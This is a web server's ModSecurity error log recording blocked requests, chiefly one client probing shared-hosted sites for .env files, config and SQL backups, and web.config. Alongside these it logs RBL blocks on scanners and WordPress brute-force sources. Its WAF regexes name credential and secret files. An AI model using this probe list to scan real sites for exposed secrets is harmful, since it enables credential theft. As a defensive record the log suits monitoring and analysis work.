[Tue May 26 19:50:53.767669 2026] [security2:error] [pid 86490:tid 86628] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/*.env.save.backup"] [unique_id "ahWsRVZMwN0DpLVWo6KRwAAAAI0"]
[Tue May 26 19:50:53.934482 2026] [security2:error] [pid 86490:tid 86668] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/dodoswap-client/.env"] [unique_id "ahWsRVZMwN0DpLVWo6KRxgAAALU"]
[Tue May 26 19:50:54.058072 2026] [security2:error] [pid 86490:tid 86735] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsRVZMwN0DpLVWo6KRvQAAAPg"]
[Tue May 26 19:50:54.271721 2026] [security2:error] [pid 86490:tid 86637] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/profile.php.bak"] [unique_id "ahWsRlZMwN0DpLVWo6KR1AAAAJY"]
[Tue May 26 19:50:54.798600 2026] [security2:error] [pid 86490:tid 86685] [client 114.119.133.194:49841] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahWsRlZMwN0DpLVWo6KR5AAAAMY"], referer: http://haddingtonwines.com/cart?remove_item=c0a62e133894cdce435bcb4a5df1db2d
[Tue May 26 19:50:55.621770 2026] [security2:error] [pid 86490:tid 86707] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/symfony-app/backend/.env"] [unique_id "ahWsR1ZMwN0DpLVWo6KR_gAAANw"]
[Tue May 26 19:50:56.631141 2026] [security2:error] [pid 86490:tid 86655] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/conf/.env.bak"] [unique_id "ahWsSFZMwN0DpLVWo6KSHwAAAKg"]
[Tue May 26 19:50:56.782344 2026] [security2:error] [pid 86490:tid 86554] [remote 74.7.241.58:60356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWsSFZMwN0DpLVWo6KSJgAAmD8"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-content/plugins/woocommerce-pdf-invoices-packing-slips/vendor/strauss/sabberworm/php-css-parser/src/CSSList
[Tue May 26 19:50:56.798241 2026] [security2:error] [pid 86490:tid 86721] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/configuration/web.config"] [unique_id "ahWsSFZMwN0DpLVWo6KSJwAAAOo"]
[Tue May 26 19:50:56.964243 2026] [security2:error] [pid 86490:tid 86687] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/lms/.env"] [unique_id "ahWsSFZMwN0DpLVWo6KSLAAAAMg"]
[Tue May 26 19:50:57.095329 2026] [security2:error] [pid 86490:tid 86643] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsSFZMwN0DpLVWo6KSIgAAAJw"]
[Tue May 26 19:50:57.131793 2026] [security2:error] [pid 86490:tid 86654] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/todo-app/server/.env"] [unique_id "ahWsSVZMwN0DpLVWo6KSMgAAAKc"]
[Tue May 26 19:50:57.300786 2026] [security2:error] [pid 86490:tid 86722] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admin/test/wp-config.bak"] [unique_id "ahWsSVZMwN0DpLVWo6KSNgAAAOs"]
[Tue May 26 19:50:57.637507 2026] [security2:error] [pid 86490:tid 86717] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/core/.env.bak"] [unique_id "ahWsSVZMwN0DpLVWo6KSQgAAAOY"]
[Tue May 26 19:50:57.978924 2026] [security2:error] [pid 86490:tid 86690] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.live.copy"] [unique_id "ahWsSVZMwN0DpLVWo6KSTwAAAMs"]
[Tue May 26 19:50:58.336603 2026] [security2:error] [pid 86490:tid 86727] [client 64.89.161.160:56786] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 160.161.89.64.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "omshriinfrastructures.com"] [uri "/assets/admin/plugins/elfinder/connectors/php/connector.php"] [unique_id "ahWsSlZMwN0DpLVWo6KSWQAAAPA"]
[Tue May 26 19:50:58.654579 2026] [security2:error] [pid 86490:tid 86664] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/wp-config-sample.bak"] [unique_id "ahWsSlZMwN0DpLVWo6KScQAAALE"]
[Tue May 26 19:50:59.808851 2026] [security2:error] [pid 86490:tid 86674] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsS1ZMwN0DpLVWo6KSjQAAALs"]
[Tue May 26 19:50:59.834764 2026] [security2:error] [pid 86490:tid 86673] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/app/etc/env.php.old"] [unique_id "ahWsS1ZMwN0DpLVWo6KSnAAAALo"]
[Tue May 26 19:51:00.340223 2026] [security2:error] [pid 86490:tid 86636] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/certificate/.env"] [unique_id "ahWsTFZMwN0DpLVWo6KSpQAAAJU"]
[Tue May 26 19:51:01.012761 2026] [security2:error] [pid 86490:tid 86648] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/auth-app/.env"] [unique_id "ahWsTVZMwN0DpLVWo6KSugAAAKE"]
[Tue May 26 19:51:01.417732 2026] [security2:error] [pid 86490:tid 86635] [client 167.160.75.240:6333] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWsTFZMwN0DpLVWo6KSrAAAAJQ"], referer: https://anujtradingco.com
[Tue May 26 19:51:01.686521 2026] [security2:error] [pid 86490:tid 86673] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/datadog/.env"] [unique_id "ahWsTVZMwN0DpLVWo6KS1QAAALo"]
[Tue May 26 19:51:01.853408 2026] [security2:error] [pid 86490:tid 86672] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/gists/cache/.env"] [unique_id "ahWsTVZMwN0DpLVWo6KS2wAAALk"]
[Tue May 26 19:51:02.021202 2026] [security2:error] [pid 86490:tid 86633] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/database_backup.sql"] [unique_id "ahWsTlZMwN0DpLVWo6KS4gAAAJI"]
[Tue May 26 19:51:02.273817 2026] [security2:error] [pid 86490:tid 86655] [client 185.191.171.6:36314] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/october-4th/list/"] [unique_id "ahWsTlZMwN0DpLVWo6KS9AAAAKg"]
[Tue May 26 19:51:02.273939 2026] [security2:error] [pid 86490:tid 86655] [client 185.191.171.6:36314] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/october-4th/list/"] [unique_id "ahWsTlZMwN0DpLVWo6KS9AAAAKg"]
[Tue May 26 19:51:02.413090 2026] [security2:error] [pid 86490:tid 86645] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsTVZMwN0DpLVWo6KS4QAAAJ4"]
[Tue May 26 19:51:02.567881 2026] [security2:error] [pid 86490:tid 86557] [remote 79.116.52.1:36596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.52.116.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWsTlZMwN0DpLVWo6KS-AAAnEI"]
[Tue May 26 19:51:03.535320 2026] [security2:error] [pid 86490:tid 86670] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/finalVersion/lcomernbootcamp/projbackend/.env"] [unique_id "ahWsT1ZMwN0DpLVWo6KTKgAAALc"]
[Tue May 26 19:51:04.209558 2026] [security2:error] [pid 86490:tid 86635] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/new/test.bak"] [unique_id "ahWsUFZMwN0DpLVWo6KTQwAAAJQ"]
[Tue May 26 19:51:04.301495 2026] [security2:error] [pid 86490:tid 86679] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsT1ZMwN0DpLVWo6KTNQAAAMA"]
[Tue May 26 19:51:04.544522 2026] [security2:error] [pid 86490:tid 86652] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/web-dist/.env"] [unique_id "ahWsUFZMwN0DpLVWo6KTTAAAAKU"]
[Tue May 26 19:51:04.711934 2026] [security2:error] [pid 86490:tid 86703] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/java-app/src/.env"] [unique_id "ahWsUFZMwN0DpLVWo6KTUwAAANg"]
[Tue May 26 19:51:06.038691 2026] [security2:error] [pid 86490:tid 86715] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/nfts/.env"] [unique_id "ahWsUlZMwN0DpLVWo6KThQAAAOQ"]
[Tue May 26 19:51:06.199409 2026] [security2:error] [pid 86490:tid 86709] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/test/sample.bak"] [unique_id "ahWsUlZMwN0DpLVWo6KTiQAAAN4"]
[Tue May 26 19:51:06.639831 2026] [security2:error] [pid 86490:tid 86592] [remote 103.11.102.22:44870] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWsUlZMwN0DpLVWo6KTmwAApWU"]
[Tue May 26 19:51:06.845399 2026] [security2:error] [pid 86490:tid 86675] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/core/.env.old"] [unique_id "ahWsUlZMwN0DpLVWo6KTpgAAALw"]
[Tue May 26 19:51:06.903750 2026] [security2:error] [pid 86490:tid 86694] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsUlZMwN0DpLVWo6KTnQAAAM8"]
[Tue May 26 19:51:07.166969 2026] [security2:error] [pid 86490:tid 86688] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/downloads/.env"] [unique_id "ahWsU1ZMwN0DpLVWo6KTrgAAAMk"]
[Tue May 26 19:51:07.418868 2026] [security2:error] [pid 86490:tid 86695] [client 185.191.171.13:48994] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/features/icon-box/"] [unique_id "ahWsU1ZMwN0DpLVWo6KTvAAAANA"]
[Tue May 26 19:51:07.418979 2026] [security2:error] [pid 86490:tid 86695] [client 185.191.171.13:48994] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/features/icon-box/"] [unique_id "ahWsU1ZMwN0DpLVWo6KTvAAAANA"]
[Tue May 26 19:51:07.812273 2026] [security2:error] [pid 86490:tid 86699] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backup/config.bak"] [unique_id "ahWsU1ZMwN0DpLVWo6KTxQAAANQ"]
[Tue May 26 19:51:07.973947 2026] [security2:error] [pid 86490:tid 86633] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/backup/main.sql"] [unique_id "ahWsU1ZMwN0DpLVWo6KTzAAAAJI"]
[Tue May 26 19:51:08.298342 2026] [security2:error] [pid 86490:tid 86722] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/fly/.env"] [unique_id "ahWsVFZMwN0DpLVWo6KT2wAAAOs"]
[Tue May 26 19:51:08.458988 2026] [security2:error] [pid 86490:tid 86716] [client 185.177.72.53:29794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/splunk/.env"] [unique_id "ahWsVFZMwN0DpLVWo6KT3gAAAOU"]
